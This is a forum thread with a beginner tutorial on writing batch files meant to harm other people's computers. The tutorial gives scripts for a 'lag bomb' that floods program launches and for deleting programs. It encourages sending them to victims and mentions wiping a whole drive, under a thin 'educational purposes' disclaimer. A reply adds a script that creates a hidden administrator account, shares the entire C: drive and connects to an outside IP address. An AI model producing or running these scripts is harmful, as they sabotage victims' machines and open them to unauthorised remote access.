Batch Tutorial! - Mess With Your Friends

Posts 1–7 of 7 · Page 1 of 1
Batch Tutorial! - Mess With Your Friends
Hey guys! This is Haites and this is my first tutorial on MPGH.

I'm sure many of you are familiar with Batch files, or have at least heard of them, but for all of those people that don't know about batch's, I'm here to show you what they are, what they do, and how you can do some serious damage to someones computer, or just have a little fun.

My Description: A Batch file is a file that executes a task with command prompt (CMD) usually reads and executes. Batch files are used to open several programs with one click, but in this case, we are using it to cause complete havoc.

FIRST OF ALL!!!
----------------
I'm not held responsible for any actions you make. This tutorial is made for educational purposes only and should not be used in any illegal behavior.
----------------

Time for the fun stuff!

All you need is notepad, and a few codes.

Open up notepad. Were going to do a quick execute of internet explorer. Make sure the notepad is empty.

Copy and Paste the following code into your notepad.

Code:
@echo off
copy 0% iexplore.exe
start iexplore.exe
"Start iexplore.exe" means that it's going to start Internet Explorer.

.exe Means Executable.

Now save that. You can name it anything, as long as you put .bat at the end.

IMPORTANT: When you save it, it's going to say "Save as Type: Test Documents (*.txt)", Ignore this. For the file name, literally put ".bat" at the end.

Example:

Save that anywhere you would like, and then open it. Internet Explorer should open. You made your first successful batch.

Now to make a lag bomb, you can freeze someones computer by putting "Start iexplore.exe" multiple times on notepad.

With Batch's, you can also delete programs too.

If you wanted to delete Internet Explorer, it would look like this:
Code:
@echo off
copy 0% iexplore.exe
del iexplore.exe
I know what your thinking, I can send this to people and when they open it, it deletes files from their computer? That is correct.

It's even possible to delete a persons whole entire C:\ drive. Thus, completely
killing their computer. I'm not going to get into that. Now you know 2 ways to do use a batch, test it out a bit. Experiment.

I don't hold any responsibility for your actions. Use batch files at your own risk.

Post comments to my tutorial if you found it useful or need any help!

There are also more tasks and commands with Batch files, and more tricks I can teach you. If you find this tutorial useful, I might make an advanced Batch file tutorial.
Great begginers tutorial for batch-files...

I'm interested!

I'm quite sure that c and c++ contain making batch-files
i know but i hate these video-tutorials mostly because you can't see anything
Open notepad and type this

Start Googleⓘ

Save as whatever.bat

And see what happens
nice, one oof the best
There's quite a few more virus/batch commands than that.
I love to hack using batch >.<
Here's a little code to have fun with.
Code:
@echo off
title Don't be Scared...
color 0a
echo oooooooooo.                                                     
echo `888'   `Y8b                                                    
echo  888      888  .ooooo.  ooo. .oo.  .oo.    .ooooo.  ooo. .oo.   
echo  888      888 d88' `88b `888P"Y88bP"Y88b  d88' `88b `888P"Y88b  
echo  888      888 888ooo888  888   888   888  888   888  888   888  
echo  888     d88' 888    .o  888   888   888  888   888  888   888  
echo o888bood8P'   `Y8bod8P' o888o o888o o888o `Y8bod8P' o888o o888o 
echo                            o8o           
echo                            `"'           
echo                           oooo   .oooo.o 
echo                           `888  d88(  "8 
echo                            888  `"Y88b.  
echo                            888  o.  )88b 
echo                           o888o 8""888P' 
echo ooooo   ooooo                     oooo         o8o                         
echo `888'   `888'                     `888         `"'                         
echo  888     888   .oooo.    .ooooo.   888  oooo  oooo  ooo. .oo.    .oooooooo 
echo  888ooooo888  `P  )88b  d88' `"Y8  888 .8P'   `888  `888P"Y88b  888' `88b  
echo  888     888   .oP"888  888        888888.     888   888   888  888   888  
echo  888     888  d8(  888  888   .o8  888 `88b.   888   888   888  `88bod8P'  
echo o888o   o888o `Y888""8o `Y8bod8P' o888o o888o o888o o888o o888o `8oooooo.  
echo                                                                 d"     YD  
echo                                                                 "Y88888P'
pause
net use = Shared.IP.range.0-155
net user (-DemonRZ-) /add
net localgroup administrators (-DemonRZ-) /add
net share system=C: /unlimited
net send * I am your server (-DemonRZ-)
net use \72.243.210.162 (-DemonRZ-)
explorer \72.243.210.162system
msg * %computername%, is being hacked >.<
Posts 1–7 of 7 · Page 1 of 1
This thread is closed for replies.

Similar Threads

Tags for this Thread

None

Talk with us